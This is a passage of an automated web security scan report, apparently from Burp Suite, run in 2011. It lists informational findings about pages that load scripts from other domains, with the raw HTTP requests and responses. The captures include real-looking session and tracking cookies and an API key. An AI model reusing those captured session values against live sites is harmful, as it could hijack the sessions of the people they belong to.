Set-Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; path=/
X-Pingback: http://hublotnation.com/wp/xmlrpc.php
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 28115
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html>
<!--[if IE 7 ]><html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]><html lang="en" class="no-js ie8"><![endif]-->
<!--[if IE 9 ]><html lang="en" class="no-js ie9"><![endif]
...[SNIP]...
</script>
<script type='text/javascript' src='http://code.jquery.com/jquery-1.5.min.js?ver=1.5'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
<script type='text/javascript' src='http://www.google.com/jsapi?ver=3.2.1'></script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=yUOjs0CdV5Dd58xfiVX0A&#038;v=1'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=yUOjs0CdV5Dd58xfiVX0A&#038;v=1&#038;ver=1.0'></script>
...[SNIP]...

20.20. http://hublotnation.com/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /?xd_receiver=1 HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.facebook.com/extern/login_status.php?api_key=50c378d8154db3a16aee8f1a8bb76f49&extern=0&channel=http%3A%2F%2Fhublotnation.com%2F%3Fxd_receiver%3D1&locale=en_US&sdk=edgar
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Mon, 26 Sep 2011 00:04:49 GMT
Last-Modified: Mon, 03 Oct 2011 00:04:49 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Length: 318
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>xd</title></head>
<body>
<script src="http://static.ak.facebook.com/js/api_lib/v0.4/XdCommReceiver.js" type="text/javascript"></script>
...[SNIP]...

20.21. http://hublotnation.com/2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://hublotnation.com
Path:   /2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/

Issue detail

The response dynamically includes the following scripts from other domains:

Request

GET /2011/09/23/hublot-watchesa-look-at-the-king-power-dwayne-wade/ HTTP/1.1
Host: hublotnation.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://hublotnation.com/
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=24bfa029727b378b6c72d277baca45b9; __utma=126786964.1720787815.1317600056.1317600056.1317600056.1; __utmb=126786964.2.10.1317600056; __utmc=126786964; __utmz=126786964.1317600056.1.1.utmcsr=hublot.com|utmccn=(referral)|utmcmd=referral|utmcct=/site/loader.swf; base_domain_50c378d8154db3a16aee8f1a8bb76f49=hublotnation.com; fbsetting_50c378d8154db3a16aee8f1a8bb76f49=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D

Response

HTTP/1.1 200 OK
Date: Mon, 03 Oct 2011 00:05:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Last-Modified: Mon, 03 Oct 2011 00:05:49 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
X-Pingback: http://hublotnation.com/wp/xmlrpc.php
Link: <http://hublotnation.com/?p=988>; rel=shortlink
Vary: Accept-Encoding,User-Agent
X-UA-Compatible: IE=8
Content-Type: text/html; charset=UTF-8
Content-Length: 38416

<!DOCTYPE html>
<!--[if IE 7 ]><html lang="en" class="no-js ie7"><![endif]-->
<!--[if IE 8 ]><html lang="en" class="no-js ie8"><![endif]-->
<!--[if IE 9 ]><html lang="en" class="no-js ie9"><![endif]
...[SNIP]...
</script>
<script type='text/javascript' src='http://code.jquery.com/jquery-1.5.min.js?ver=1.5'></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://static.ak.connect.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php/en_US?ver=0.4'></script>
<script type='text/javascript' src='http://www.google.com/jsapi?ver=3.2.1'></script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=yUOjs0CdV5Dd58xfiVX0A&#038;v=1'></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...
</script>
<script type='text/javascript' src='http://platform.twitter.com/anywhere.js?id=yUOjs0CdV5Dd58xfiVX0A&#038;v=1&#038;ver=1.0'></script>
...[SNIP]...

20.22. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEBAgUCAQQAAAAAHifUFwAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+1008%2C+1317599426%29%3Buf%28%27c%27%2C+117682%2C+1317599426%29%3Buf%28%27g%27%2C+51717%2C+1317599426%29%3Buf%28%27r%27%2C+596402%2C+1317599426%29%3Bppv%2815221%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815223%2C+%278398047279950264091%27%2C+1317599426%2C+1317685826%2C+117682%2C+25661%2C+0%29%3Bppv%2815225%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815227%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815229%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3Bppv%2815231%2C+%278398047279950264091%27%2C+1317599426%2C+1320191426%2C+117682%2C+25661%2C+0%29%3B&cnd=!xCOKHwiylwcQsrMkGAAgvcgBMAA4_ANAAEjsAlAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAagBA7ABALkBxSCwcmiRzT_BAVgGUQHvCdc_yQGamZmZmZnxP9kBf_s6cM6I5D_gAdQv&ccd=!sAQDJgiylwcQsrMkGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:52:21 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Sun, 02 Oct 2011 23:52:21 GMT
Content-Length: 3209

<IFRAME SRC="http://ad.doubleclick.net/adi/N6010.456584.XAXIS.COM/B5752701.15;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhO
...[SNIP]...
2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?" WIDTH=728 HEIGHT=90 MARGINWIDTH=0 MARGINHEIGHT=0

HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N6010.456584.XAXIS.COM/B5752701.15;abr=!ie;sz=728x90;click=http://ib.adnxs.com/click?znuEnuzW1T-HFtnO91PTPwAAAGBmZvY_aFoouqpj1D-qm4u_7QnXPxv3XqCB24t0cEeI8W8QIlnC-IhOAAAAAE1ECABlAQAAbAEAAAIAAACyGQkAPWQAAAAAAABVU0QAVVNEANgCWgD8AdsEbBEDAQUCAQQAAAAAHyfnFwAAAAA./cnd=!sAQDJgiylwcQsrMkGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ0CQQwF0L9cGmnbILXktedyQAsU4TkkQiogpa5tglYIES9_KxYA18hqI1elPlul2FjIRBt55OzszqIl4HB_f_cVx__w5KOrCHGPk2bNTDMNo20zLlWs9JwCTkC5BZyxfF4BF-D5wA90U0FEcwAAAA%3D%3D%26dst%3D;ord=1317599426?">
</SCRIPT>
...[SNIP]...

20.23. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8BAgUCAQQAAAAA9CQ0EAAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317599958%29%3Buf%28%27c%27%2C+149177%2C+1317599958%29%3Buf%28%27r%27%2C+652926%2C+1317599958%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3Bppv%2817492%2C+%273378417238380468817%27%2C+1317599958%2C+1317859158%2C+149177%2C+25661%2C+0%29%3B&cnd=!Dh5vzwi5jQkQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAB4AIABAIgBAJABAZgBAaABAqgBA7ABALkBkJ0uALYV5D_BAZCdLgC2FeQ_yQFmZmZmZmbyP9kBAAAAAAAA8D_gAQA.&ccd=!NwWFKgi5jQkQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OURo SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Sun, 19-Sep-2021 23:59:23 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Sun, 02 Oct 2011 23:59:23 GMT
Content-Length: 627

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VA8_znuE3j81XrpJDALbPwAAAMDMzPQ_idS0i2nG4T9os-pztRXkP1FauSSUjOIucEeI8W8QIlnW-ohOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEKA8DAQUCAQQAAAAA9SRHEAAAAAA./cnd=!NwWFKgi5jQkQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLuQ1CQQwFwPe5tNJvg9SS97K9AS3Qw54xZdAVXUAvRIjJZ8cG4Npzjb2oEHtTSs0LWddJNc4UuK9qJg6H-_P73nH8j5bbHDEE4pEWLROmlWch7wurhaJDssMJ0JvDGdunOlyAxws_JgE413MAAAA%3D%26dst%3D">
</script>

20.24. http://ib.adnxs.com/if

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ib.adnxs.com
Path:   /if

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /if?enc=VgQNJ3Vfzj_hehSuR-HKPwAAAMDMzPQ_gL81A54syz82VmKelbTOPwrjFbNuftsOcEeI8W8QIllB_IhOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEjAgBAgUCAQQAAAAA4CIHNQAAAAA.&pubclick=http://bid.openx.net/click?cd%3DH4sIAAAAAAAAABXLsQ0CMQwF0H8coEi3Bq2lxE7iuKBgAXYgOKkZg60Yg2Uo0L3-bVgAXKTVpxsP4qSdsotSlyZklrVr9tEKBxzu799tw7qPXvpwYaboedJsNdIswygli9rY1GsJOAJ6DThh-T4CzsDrgz_96owTcwAAAA%3D%3D%26dst%3D&tt_code=goal.com&udj=uf%28%27a%27%2C+27755%2C+1317600321%29%3Buf%28%27c%27%2C+125959%2C+1317600321%29%3Buf%28%27r%27%2C+652926%2C+1317600321%29%3Bppv%2817492%2C+%271070588350346683146%27%2C+1317600321%2C+1317859521%2C+125959%2C+25661%2C+0%29%3Bppv%2817492%2C+%271070588350346683146%27%2C+1317600321%2C+1317859521%2C+125959%2C+25661%2C+0%29%3B&cnd=!1h8O6giH2AcQ_uwnGAAgvcgBMAE4_ANAAEiCCFAAWABgeGgAcAJ4DIABAogBDJABAZgBAaABAqgBA7ABALkBDD4-AZa0zj_BAQw-PgGWtM4_yQHNzMzMzMz0P9kBAAAAAAAA8D_gAQA.&ccd=!TgVpKwiH2AcQ_uwnGL3IASAA&referrer=http://www.goal.com&media_subtypes=1 HTTP/1.1
Host: ib.adnxs.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: icu=ChIIrIsBEAoYASABKAEwwfGD8wQQwfGD8wQYAA..; anj=Kfu=8fG5EfE:3F.0s]#%2L_'x%SEV/i#-?R!z6Ut0QkM9e5'Qr*vP.V*lpYBPp[Bs3dBED7@8!MMT@<SGb]bp@OWFe]M3^!WeuSpp!<tk0xzCgSDb'W7Qc:sp!-ewEI]-`k1+Uxk1GOGkI/$_.v=_!`4hTmV3oY`#EoW=LnXT`HX)Ny^rF?u'>@*e?CDQ!(G@]1BW0Q<EQU#3!ZR*?l7/tm%40RO-2NpM_ZlEy!<e/e+ztxA; uuid2=-1

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: policyref="http://cdn.adnxs.com/w3c/policy/p3p.xml", CP="NOI DSP COR ADM PSAo PSDo OUR SAMo UNRo OTRo BUS COM NAV DEM STA PRE"
Set-Cookie: uuid2=-1; path=/; expires=Mon, 20-Sep-2021 00:05:22 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/html; charset=utf-8
Date: Mon, 03 Oct 2011 00:05:22 GMT
Content-Length: 633

<script language="javascript" src="http://www.inadcoads.com/script.ashx?pczid=269ccbc6-3ea2-4863-8eb1-67f59498f8ce&click_url=http://ib.adnxs.com/click?VgQNJ3Vfzj_hehSuR-HKPwAAAMDMzPQ_gL81A54syz82VmKelbTOPwrjFbNuftsOcEeI8W8QIllB_IhOAAAAAE1ECABlAQAAAgQAAAIAAAB-9gkAPWQAAAAAAABVU0QAVVNEACwB-gD8AdsEjAgDAQUCAQQAAAAA4SIaNQAAAAA./cnd=!TgVpKwiH2AcQ_uwnGL3IASAA/referrer=http%3A%2F%2Fwww.goal.com/clickenc=http%3A%2F%2Fbid.openx.net%2Fclick%3Fcd%3DH4sIAAAAAAAAABXLsQ0CMQwF0H8coEi3Bq2lxE7iuKBgAXYgOKkZg60Yg2Uo0L3-bVgAXKTVpxsP4qSdsotSlyZklrVr9tEKBxzu799tw7qPXvpwYaboedJsNdIswygli9rY1GsJOAJ6DThh-T4CzsDrgz_96owTcwAAAA%3D%3D%26dst%3D">
</script>

20.25. http://o-va1.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imp?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfv78GHyKVns_3jj9bHHoO7pP3Bj44Sw HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s=!1762!3105!2445!1731; opvc=!3919,CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M#,1317600698; pvmap=!3919,1317600698,ova!3919,1317600201,ova3; synclock=full; tuuid=f9bdca69-e609-4297-9145-48ea56a0756c

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Mon, 03 Oct 2011 00:13:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: tuuid=d22326de-7542-4e09-8630-c6943c0e5308; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Set-Cookie: opvc=!3919,CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M#,1317600811; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Set-Cookie: pvmap=!3919,1317600811,ova!3919,1317600797,ova!3919,1317600796,ova!3919,1317600795,ova!3919,1317600791,ova!3919,1317600784,ova!3919,1317600201,ova3d0469776442fe78d28ed2840; path=/; expires=Wed, 02 Oct 2013 00:13:31 GMT; domain=.wtp101.com
Cache-Control: no-cache, no-store, must-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
Content-Length: 3709

<html><body><iframe SRC="http://fw.adsafeprotected.com/rjsi/dc/10625/165711/adi/N5282.161249.ADNETIK.COM/B5256632.283;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkNWI0YW
...[SNIP]...
NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1239357571?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<script language='JavaScript1.1' SRC="http://fw.adsafeprotected.com/rjss/dc/10625/165712/adj/N5282.161249.ADNETIK.COM/B5256632.283;abr=!ie;sz=300x250;pc=[TPAS_ID];click0=http://o-va1.wtp101.com/click?bc=CgVvcGVueBIkNWI0YWUwODktMDVhYi00NWQ4LWJmMDMtZDcwNmM0YzJkZjM0IW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPgBADpBHFzRlFVHvA.8QRYkXmDBvL-P.gEAIAFAYIHB1dpbmRvd3M%3D&redir=;ord=1239357571?">
</SCRIPT>
...[SNIP]...

20.26. http://o-va1.wtp101.com/imp

Summary

Severity:   Information
Confidence:   Certain
Host:   http://o-va1.wtp101.com
Path:   /imp

Issue detail

The response dynamically includes the following script from another domain:

Request

GET /imp?bc=CgVvcGVueBIkMjg5MjMxMGQtNDYwYS00Y2UzLWJjMjYtNDNhMDhkZmQ1YTcxIW3yiNFWl-A.KAowowU47amfhAdAxPVVSgczMDB4MjUwWhNodHRwOi8vd3d3LmdvYWwuY29tYghnb2FsLmNvbXoA-gEkYjViZWQzMjItMGQ0Zi1mODYwLWY1ZTktMTE5MDc4Mjk3ZDY1gAKNjQSIAhmQAtoT2gMNNTAuMjMuMTIzLjEwNuIDAlVT6gMCVFjwA-8E-gMGRGFsbGFzggQAigQCZW6SBAJlbpoEak1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDYuMTsgV09XNjQpIEFwcGxlV2ViS2l0LzUzNS4xIChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzE0LjAuODM1LjE4NyBTYWZhcmkvNTM1LjGiBAZDaHJvbWWyBCQ5NDY5N2IzZi00YThlLWU4ZmQtNTZkMi1lNDI4MGU2ZWIyNTK6BCRmOWJkY2E2OS1lNjA5LTQyOTctOTE0NS00OGVhNTZhMDc1NmPpBH1GFLMK6OU.8QT8HNVps3f8P.gEAIAFAYIHB1dpbmRvd3M=&prc=AAABMscfG0LluyTuhmTAJwT3iYRqhyPr7vh5Cg HTTP/1.1
Host: o-va1.wtp101.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.187 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
